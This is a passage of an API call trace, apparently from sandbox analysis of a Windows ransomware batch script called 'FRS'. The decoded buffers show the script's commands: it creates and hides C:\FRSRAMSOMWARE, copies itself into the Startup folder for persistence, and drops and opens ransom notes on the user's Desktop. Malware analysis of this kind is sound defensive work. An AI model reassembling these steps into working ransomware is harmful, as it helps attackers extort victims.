[0081.171] GetFileType (hFile=0x2f0) returned 0x1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0081.171] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0081.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0081.171] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.171] GetFileType (hFile=0x2f0) returned 0x1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0081.172] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0081.172] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0081.172] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.172] GetFileType (hFile=0x2f0) returned 0x1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0081.172] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0081.172] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0081.172] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.172] GetFileType (hFile=0x2f0) returned 0x1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0081.172] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0081.172] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0081.172] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.172] GetFileType (hFile=0x2f0) returned 0x1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0081.172] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0081.172] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0081.172] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.172] GetFileType (hFile=0x2f0) returned 0x1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0081.172] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0081.172] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0081.172] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0081.173] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.173] GetFileType (hFile=0x2f0) returned 0x1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0081.173] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0081.173] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0081.173] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.173] GetFileType (hFile=0x2f0) returned 0x1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0081.173] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0081.173] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0081.173] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.173] GetFileType (hFile=0x2f0) returned 0x1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0081.173] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0081.173] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0081.173] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.173] GetFileType (hFile=0x2f0) returned 0x1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0081.173] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0081.173] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0081.173] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.173] GetFileType (hFile=0x2f0) returned 0x1 [0081.173] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0081.173] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0081.174] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0081.174] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.174] GetFileType (hFile=0x2f0) returned 0x1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0081.174] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0081.174] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0081.174] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.174] GetFileType (hFile=0x2f0) returned 0x1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0081.174] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0081.174] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0081.174] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.174] GetFileType (hFile=0x2f0) returned 0x1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0081.174] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0081.174] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0081.174] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.174] GetFileType (hFile=0x2f0) returned 0x1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0081.174] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.174] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0081.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0081.175] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.175] GetFileType (hFile=0x2f0) returned 0x1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0081.175] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0081.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0081.175] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.175] GetFileType (hFile=0x2f0) returned 0x1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0081.175] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0081.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0081.175] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.175] GetFileType (hFile=0x2f0) returned 0x1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0081.175] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0081.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0081.175] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.175] GetFileType (hFile=0x2f0) returned 0x1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0081.175] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0081.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0081.175] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0081.175] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.175] GetFileType (hFile=0x2f0) returned 0x1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0081.176] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0081.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0081.176] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.176] GetFileType (hFile=0x2f0) returned 0x1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0081.176] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0081.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0081.176] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.176] GetFileType (hFile=0x2f0) returned 0x1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0081.176] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0081.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0081.176] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.176] GetFileType (hFile=0x2f0) returned 0x1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0081.176] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0081.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 